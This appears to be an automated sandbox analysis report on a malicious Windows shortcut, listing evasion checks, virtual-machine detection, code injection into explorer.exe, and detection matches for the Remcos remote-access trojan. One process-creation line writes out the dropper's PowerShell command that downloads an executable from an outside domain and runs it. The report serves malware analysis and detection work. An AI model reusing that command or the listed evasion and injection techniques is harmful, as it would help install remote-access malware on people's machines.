Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\DZIPR.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.1 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep count: 4968 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 712	Thread sleep count: 4876 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7908	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	11_2_0040301A
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	11_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	12_2_6FE2748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	13_2_6C91748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	19_2_6FEA748E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6vmware
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000012.00000002.2496354459.00000174C5854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y%
Source: svchost.exe, 00000012.00000002.2495105676.00000174C002B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0Z

Source: C:\Users\user\DZIPR.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\DZIPR.exe

Code function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_2_6FE33F34

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

11_2_00406D5D

Contains functionality to read the PEB

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25D78 mov eax, dword ptr fs:[00000030h]	12_2_6FE25D78
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25CA0 mov eax, dword ptr fs:[00000030h]	12_2_6FE25CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C915CA0 mov eax, dword ptr fs:[00000030h]	13_2_6C915CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5D78 mov eax, dword ptr fs:[00000030h]	19_2_6FEA5D78
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA5CA0 mov eax, dword ptr fs:[00000030h]	19_2_6FEA5CA0

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6FE33F34
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE3CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_6FE3CE5C
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE38034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_6FE38034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C92CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_6C92CE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C923F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6C923F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C928034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6C928034
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FEB3F34
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEBCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6FEBCE5C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FEB8034

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FE266A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6C982E3D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6FEA66A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF0F4DD	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x6C9166A2	Jump to behavior
Source: C:\Users\user\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtQuerySystemInformation: Direct from: 0x701066A2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF038F3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	NtProtectVirtualMemory: Direct from: 0x6FF12B32	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 8164 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 8164 base: 4A0000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4044 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 4044 base: 560000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 2056 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 2056 base: 400000 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 1180 base: F379C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 1180 base: 310000 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 4A0000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 560000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F379C0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 310000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\hello.exe C:\Users\user\AppData\Roaming/hello.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_0040D72E cpuid

11_2_0040D72E

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,	11_2_00401F9D
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoA,	12_2_6FE44DBC
Source: C:\Users\user\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	12_2_6FE289B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	13_2_6C934DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	13_2_6C9189B5
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoA,	19_2_6FEC4DBC
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,	19_2_6FEA89B5

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hello.exe

11_2_00401626

Source: C:\Users\user\DZIPR.exe

12_2_6FE3D72B

Source: C:\Users\user\AppData\Roaming\hello.exe

11_2_00404FAA

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Windows Analysis Report
MdkbG2pK4l.lnk

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1518485
Product:	CloudBasic
Start time:	18:32:55
Start date:	25.09.2024
Sample:	MdkbG2pK4l.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9ee2b12e8974f00111bb9887f7f9e19f
SHA1:	54d2830260e949b25d291c07ebc6d29d8b4f0af8
SHA256:	f5734ae475931dbb561fc5b636d5a7825d8d99efa8d4d9cdff7e89bf163613dd
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	B1F13A8EAF6BE6F03654DB76A9710DBF	AAE6675DE8A3789FCBD153CE15B637DD4CEF596B	54595DF67709C099469CE2E25E6B2BEA8F9128BB1A8E2FBAF864E0C193A51F9F
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x0bed3222, page size 16384, DirtyShutdown, Windows version 10.0	571F8D63131505D8FE5CA1507A31490D	E93D77A28D92CEEDAF384C4D4B6D660CED90F799	0BA98F6B323C49982B5AC577EFBAFEFDBC23AAC57189CA43BC19769097C5095D
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	6DC5975EB1913EE9C888DA158D206276	BC9FB85E2B60E4B272041DEFAD07718CCF5D53A0	B1DE926B1389EC39C394D35D6F6C0BE2C1B3E6523A02803B11E5FD5CEBAD9D5F
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
